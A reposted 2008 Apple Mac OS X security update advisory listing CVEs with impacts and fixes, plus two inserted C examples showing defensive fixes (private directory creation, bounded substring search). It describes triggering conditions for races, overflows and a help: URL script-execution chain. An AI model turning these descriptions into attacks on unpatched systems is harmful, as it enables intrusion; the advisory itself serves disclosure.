Description: Files with names ending in ".ief" can be automatically opened in AppleWorks if Safari's "Open 'Safe' files" preference is enabled. This is not the intended behavior and could lead to security policy violations. This update addresses the issue by removing ".ief" from the list of safe file types. This issue only affects systems prior to Mac OS X v10.5 with AppleWorks installed.

CUPS

CVE-ID: CVE-2008-0596

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: A remote attacker may be able to cause an unexpected application termination if printer sharing is enabled

Description: A memory leak exists in CUPS. By sending a large number of requests to add and remove shared printers, an attacker may be able to cause a denial of service. This issue can not result in arbitrary code execution. This update addresses the issue through improved memory management. This issue does not affect systems prior to Mac OS X v10.5.

CUPS

CVE-ID: CVE-2008-0047

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: A remote attacker may be able to cause an unexpected application termination or arbitrary code execution if printer sharing is enabled

Description: A heap buffer overflow exists in the CUPS interface's processing of search expressions. If printer sharing is enabled, a remote attacker may be able to cause an unexpected application termination or arbitrary code execution with system privileges. If printer sharing is not enabled, a local user may be able to gain system privileges. This update addresses the issue by performing additional bounds checking. This issue does not affect systems prior to Mac OS X v10.5. Credit to regenrecht working with the VeriSign iDefense VCP for reporting this issue.

CUPS

CVE-ID: CVE-2008-0053, CVE-2008-0882

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in CUPS may lead to an unexpected application termination or arbitrary code execution with system privileges

Description: Multiple input validation issues exist in CUPS, the most serious of which may lead to arbitrary code execution with system privileges. This update addresses the issues by updating to CUPS 1.3.6. These issues do not affect systems prior to Mac OS X v10.5.

curl

CVE-ID: CVE-2005-4077

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Running curl with a maliciously crafted URL may lead to an unexpected application termination or arbitrary code execution

Description: A one byte buffer overflow exists in curl 7.13.1. By enticing a user to run curl with a maliciously crafted URL, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue by updating curl to version 7.16.3. Crash Reporter was updated to match the curl changes. This issue does not affect systems running Mac OS X v10.5 or later.

Emacs

CVE-ID: CVE-2007-6109

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Format string vulnerability in Emacs Lisp may lead to an unexpected application termination or possibly arbitrary code execution

Description: A stack buffer overflow exists in Emacs' format function. By exploiting vulnerable Emacs Lisp which allows an attacker to provide a format string containing a large precision value, an attacker may cause an unexpected application termination or possibly arbitrary code execution. Further information on the patch applied is available via the Savannah Emacs website here.

Emacs

CVE-ID: CVE-2007-5795

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Safe mode checks in Emacs may be bypassed

Description: A logic error in Emacs' hack-local-variable function allows any local variable to be set, even if `enable-local-variables' is set to :safe. By enticing a user to load a file containing a maliciously crafted local variables declaration, a local user may cause an unauthorized modification of Emacs Lisp variables leading to arbitrary code execution. This issue has been fixed through improved :safe mode checks. The patch applied is available via the Savannah Emacs website here. This issue does not affect systems prior to Mac OS X v10.5.

file

CVE-ID: CVE-2007-2799

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Running the file command on a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution

Description: An integer overflow vulnerability exists in the file command line tool, which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. This issue does not affect systems running Mac OS X v10.5 or later. Credit to Colin Percival of the FreeBSD security team for reporting this issue.

Foundation

CVE-ID: CVE-2008-0054

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Usage of the NSSelectorFromString API may result in an unexpected method being called

Description: An input validation issue exists in the NSSelectorFromString API. Passing it a malformed selector name may result in the return of an unexpected selector, which could lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation on the selector name. This issue does not affect systems running Mac OS X v10.5 or later.

Foundation

CVE-ID: CVE-2008-0055

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: A local user can interfere in other users' file operations and may be able to obtain elevated privileges

Description: When performing a recursive file copying operation, NSFileManager creates directories as world-writable, and only later restricts the permissions. This creates a race condition during which a local user can manipulate the directory and interfere in subsequent operations. This may lead to a privilege escalation to that of the application using the API. This update addresses the issue by creating directories with restrictive permissions. This issue does not affect systems running Mac OS X v10.5 or later.
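As an added example, not Foundation's own code, here is a C routine that applies the restrictive mode at creation time and then verifies what was created, instead of creating the directory world-writable and tightening permissions afterwards; create_private_dir, the audit helper and the /tmp scratch path are assumptions of this example.

```c
#include <errno.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Create 'path' as a directory only the calling user can access.
 * The mode is fixed in the mkdir() call itself, so there is no window
 * in which another local user can use a world-writable directory.
 * Returns 0 on success, -1 on failure with errno set. */
int create_private_dir(const char *path) {
    struct stat st;
    mode_t old_umask = umask(077);      /* never grant group/other bits */
    int rc = mkdir(path, S_IRWXU);      /* 0700 at creation time */
    umask(old_umask);
    if (rc != 0)
        return -1;                      /* EEXIST included: a pre-existing
                                           entry may belong to someone else */
    /* Verify the result without following symlinks. */
    if (lstat(path, &st) != 0)
        return -1;
    if (!S_ISDIR(st.st_mode) || st.st_uid != geteuid() ||
        (st.st_mode & (S_IWGRP | S_IWOTH)) != 0) {
        rmdir(path);
        errno = EACCES;
        return -1;
    }
    return 0;
}

/* Audit helper: 1 if 'path' is writable by group or others, 0 if not,
 * -1 if it cannot be inspected. */
int dir_is_group_or_world_writable(const char *path) {
    struct stat st;
    if (lstat(path, &st) != 0)
        return -1;
    return (st.st_mode & (S_IWGRP | S_IWOTH)) != 0;
}

/* Per-process scratch path under /tmp, constructed for this demo. */
const char *demo_dir_path(void) {
    static char buf[64];
    snprintf(buf, sizeof buf, "/tmp/private_dir_demo_%ld", (long)getpid());
    return buf;
}

int main(void) {
    const char *p = demo_dir_path();
    if (create_private_dir(p) == 0) {
        printf("%s created; group/other-writable: %d\n", p,
               dir_is_group_or_world_writable(p));
        rmdir(p);
    } else {
        perror("create_private_dir");
    }
    return 0;
}
```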

Foundation

CVE-ID: CVE-2008-0056

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Programs using the NSFileManager API could be manipulated to execute arbitrary code

Description: A long pathname with an unexpected structure can expose a stack buffer overflow vulnerability in NSFileManager. Presenting a specially crafted path to a program using NSFileManager could lead to the execution of arbitrary code. This update addresses the issue by ensuring a properly sized destination buffer. This issue does not affect systems running Mac OS X v10.5 or later.

Foundation

CVE-ID: CVE-2008-0058

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Visiting a maliciously crafted website may lead to a denial of service or arbitrary code execution

Description: A thread race condition exists in NSURLConnection's cache management, which can cause a deallocated object to receive messages. Triggering this issue may lead to a denial of service, or arbitrary code execution with the privileges of Safari or another program using NSURLConnection. This update addresses the issue by removing an unsynchronized caching operation. This issue does not affect systems running Mac OS X v10.5 or later. Credit to Daniel Jalkut of Red Sweater Software for reporting this issue.

Foundation

CVE-ID: CVE-2008-0059

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Processing an XML document may lead to an unexpected application termination or arbitrary code execution

Description: A race condition exists in NSXML. By enticing a user to process an XML file in an application which uses NSXML, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue through improvements to the error handling logic of NSXML. This issue does not affect systems running Mac OS X v10.5 or later.

Help Viewer

CVE-ID: CVE-2008-0060

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Accessing a maliciously crafted help: URL may lead to arbitrary AppleScript execution

Description: A malicious help:topic_list URL may insert arbitrary HTML or JavaScript into the generated topic list page, which may redirect to a Help Viewer help:runscript link that runs AppleScript. This update addresses the issue by performing HTML escaping on the URL data used in help topic lists before building the generated page. Credit to Brian Mastenbrook for reporting this issue.

Image Raw

CVE-ID: CVE-2008-0987

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Viewing a maliciously crafted image may lead to an unexpected application termination or arbitrary code execution

Description: A stack based buffer overflow exists in the handling of Adobe Digital Negative (DNG) image files. By enticing a user to open a maliciously crafted image file, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue through improved validation of DNG image files. This issue does not affect systems prior to Mac OS X v10.5. Credit to Clint Ruoho of Laconic Security for reporting this issue.

Kerberos

CVE-ID: CVE-2007-5901, CVE-2007-5971, CVE-2008-0062, CVE-2008-0063

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in MIT Kerberos 5 may lead to an unexpected application termination or arbitrary code execution with system privileges

Description: Multiple memory corruption issues exist in MIT Kerberos 5, which may lead to an unexpected application termination or arbitrary code execution with system privileges. Further information on the issues and the patches applied is available via the MIT Kerberos website at http://web.mit.edu/Kerberos/ . CVE-2008-0062 and CVE-2008-0063 do not affect systems running Mac OS X v10.5 or later. CVE-2007-5901 does not affect systems prior to Mac OS X v10.4.

libc

CVE-ID: CVE-2008-0988

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Applications that use the strnstr API could be vulnerable to a denial of service

Description: An off by one issue exists in Libsystem's strnstr(3) implementation. Applications that use the strnstr API can read one byte beyond the limit specified by the user, which may lead to an unexpected application termination. This update addresses the issue through improved bounds checking. This issue does not affect systems running Mac OS X v10.5 or later. Credit to Mike Ash of Rogue Amoeba Software for reporting this issue.
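As an added example, not Apple's Libsystem code, the following C implements a bounded substring search instrumented to record the highest haystack index it reads, so a test can confirm that no read ever reaches the caller's limit; bounded_strnstr, peek, last_max_index_read and search_within_limit are names introduced here.

```c
#include <stddef.h>
#include <string.h>

/* Highest haystack index touched by the most recent bounded_strnstr()
 * call. Demo instrumentation: lets a caller check that every read
 * stayed below the limit it supplied. */
static size_t g_max_index_read;

size_t last_max_index_read(void) { return g_max_index_read; }

static char peek(const char *s, size_t i) {
    if (i > g_max_index_read)
        g_max_index_read = i;
    return s[i];
}

/* Locate 'needle' within the first 'len' bytes of 'haystack', stopping
 * at a NUL byte. A candidate position i is examined only while
 * i + nlen <= len, so the largest index read is len - 1, never len. */
char *bounded_strnstr(const char *haystack, const char *needle, size_t len) {
    size_t nlen = strlen(needle);
    size_t i;
    g_max_index_read = 0;
    if (nlen == 0)
        return (char *)haystack;
    for (i = 0; i + nlen <= len; i++) {
        size_t j = 0;
        while (j < nlen) {
            char c = peek(haystack, i + j);
            if (c == '\0' || c != needle[j])
                break;
            j++;
        }
        if (j == nlen)
            return (char *)(haystack + i);
        if (peek(haystack, i) == '\0')   /* string ends before 'len' */
            return NULL;
    }
    return NULL;
}

/* Run a search and report (1/0) whether all reads stayed below 'len'. */
int search_within_limit(const char *haystack, const char *needle, size_t len) {
    bounded_strnstr(haystack, needle, len);
    return len == 0 || last_max_index_read() < len;
}
```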

mDNSResponder

CVE-ID: CVE-2008-0989

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: A local user may be able to execute arbitrary code with system privileges

Description: A format string issue exists in mDNSResponderHelper. By setting the local hostname to a maliciously crafted string, a local user could cause a denial of service or arbitrary code execution with the privileges of mDNSResponderHelper. This update addresses the issue by using a static format string. This issue does not affect systems prior to Mac OS X v10.5.

notifyd

CVE-ID: CVE-2008-0990

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: A local user may be able to deny access to notifications

Description: notifyd accepts Mach port death notifications without verifying that they come from the kernel. If a local user sends fake Mach port death notifications to notifyd, applications that use the notify(3) API to register for notifications may never receive the notifications. This update addresses the issue by only accepting Mach port death notifications from the kernel. This issue does not affect systems running Mac OS X v10.5 or later.

OpenSSH

CVE-ID: CVE-2007-4752

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: A remote attacker may be able to execute arbitrary code with elevated privileges

Description: OpenSSH forwards a trusted X11 cookie when it cannot create an untrusted one. This may allow a remote attacker to gain elevated privileges. This update addresses the issue by updating OpenSSH to version 4.7. Further information is available via the OpenSSH website here.

pax archive utility

CVE-ID: CVE-2008-0992

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Running the pax command on a maliciously crafted archive may lead to arbitrary code execution

Description: The pax command line tool does not check a length in its input before using it as an array index, which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by checking the index. This issue does not affect systems prior to Mac OS X v10.5.

PHP

CVE-ID: CVE-2007-1659, CVE-2007-1660, CVE-2007-1661, CVE-2007-1662, CVE-2007-4766, CVE-2007-4767, CVE-2007-4768, CVE-2007-4887

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in PHP 5.2.4

Description: PHP is updated to version 5.2.5 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP website at http://www.php.net/ . PHP version 5.2.x is only provided with Mac OS X v10.5 systems.

PHP

CVE-ID: CVE-2007-3378, CVE-2007-3799

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in PHP 4.4.7

Description: PHP is updated to version 4.4.8 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP website at http://www.php.net/

Podcast Producer

CVE-ID: CVE-2008-0993

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Podcast Capture exposes passwords to other local users

Description: The Podcast Capture application provides passwords to a subtask through the arguments, potentially exposing the passwords to other local users. This update corrects the issue by providing passwords to the subtask through a pipe. This issue does not affect systems prior to Mac OS X v10.5. Credit to Maximilian Reiss of Chair for Applied Software Engineering, TUM for reporting this issue.

Preview

CVE-ID: CVE-2008-0994

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Saving to encrypted PDF in Preview produces files that may be read without the password

Description: When Preview saves a PDF file with encryption, it uses 40-bit RC4. This encryption algorithm may be broken with significant but readily available computing power. A person with access to the file may apply a brute-force technique to view it. This update enhances the encryption to 128-bit RC4.

Printing

CVE-ID: CVE-2008-0995

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Printing to encrypted PDF produces files that may be read without the `open' password

Description: Printing to a PDF file and setting an 'open' password uses 40-bit RC4. This encryption algorithm may be broken with significant but readily available computing power. A person with access to the file may apply a brute-force technique to view it. This update enhances the encryption to 128-bit RC4. This issue does not affect systems prior to Mac OS X v10.5.

Printing

CVE-ID: CVE-2008-0996

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Printing to an authenticated print queue may disclose login credentials

Description: An information disclosure issue exists in the handling of authenticated print queues. When starting a job on an authenticated print queue, the credentials used for authentication may be saved to disk. This update addresses the issue by removing user credentials from printing presets before saving them to disk. This issue does not affect systems prior to Mac OS X v10.5.

System Configuration

CVE-ID: CVE-2008-0998

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: A local user may be able to execute arbitrary code with system privileges

Description: The privileged tool NetCfgTool uses distributed objects to communicate with untrusted client programs on the local machine. By sending a maliciously crafted message, a local user can bypass the authorization step and may cause arbitrary code execution with the privileges of the privileged program. This update addresses the issue by performing additional validation of distributed objects.

UDF

CVE-ID: CVE-2008-0999

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Opening a maliciously crafted disk image may lead to an unexpected system shutdown

Description: A null pointer dereference issue exists in the handling of Universal Disc Format (UDF) file systems. By enticing a user to open a maliciously crafted disk image, an attacker may cause an unexpected system shutdown. This update addresses the issue through improved validation of UDF file systems. This issue does not affect systems prior to Mac OS X v10.5. Credit to Paul Wagland of Redwood Software, and Wayne Linder of Iomega for reporting this issue.

Wiki Server

CVE-ID: CVE-2008-1000

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: A user with access to edit wiki content may be able to execute arbitrary commands as the wiki server

Description: A path traversal issue exists in the Mac OS X v10.5 Server Wiki Server. Attackers with access to edit wiki content may upload files that leverage this issue to place content wherever the wiki server can write, which may lead to arbitrary code execution with the privileges of the wiki server. This update addresses the issue through improved file name handling. This issue does not affect systems prior to Mac OS X v10.5. Credit to Rodrigo Carvalho, from the Core Security Consulting Services (CSC) team of CORE Security Technologies.

X11

CVE-ID: CVE-2007-4568, CVE-2007-4990

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Multiple vulnerabilities in X11 X Font Server (XFS) 1.0.4

Description: Multiple vulnerabilities exist in X11 X Font Server (XFS) 1.0.4, the most serious of which may lead to arbitrary code execution. This update addresses the issue by updating to version 1.0.5. Further information is available via the X.Org website at http://www.x.org/wiki/Development/Security . These issues are already addressed in systems running Mac OS X v10.5.2.

X11

CVE-ID: CVE-2006-3334, CVE-2006-5793, CVE-2007-2445, CVE-2007-5266, CVE-2007-5267, CVE-2007-5268, CVE-2007-5269

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in X11's libpng 1.2.8

Description: The PNG reference library (libpng) is updated to version 1.2.24 to address several vulnerabilities, the most serious of which may lead to a remote denial of service or arbitrary code execution. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html . This issue affects libpng within X11. It does not affect systems prior to Mac OS X v10.5.

X11

CVE-ID: CVE-2007-5958, CVE-2008-0006, CVE-2007-6427, CVE-2007-6428, CVE-2007-6429

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in the X11 server

Description: Numerous vulnerabilities in the X11 server allow execution of arbitrary code with the privileges of the user running the X11 server if the attacker can authenticate to the X11 server. This is a security vulnerability only if the X11 server is configured to not require authentication, which Apple does not recommend. This update fixes the issue by applying the updated X.Org patches. Further information is available via the X.Org website at http://www.x.org/wiki/Development/Security

Go update!

Joel Esler
http://www.joelesler.net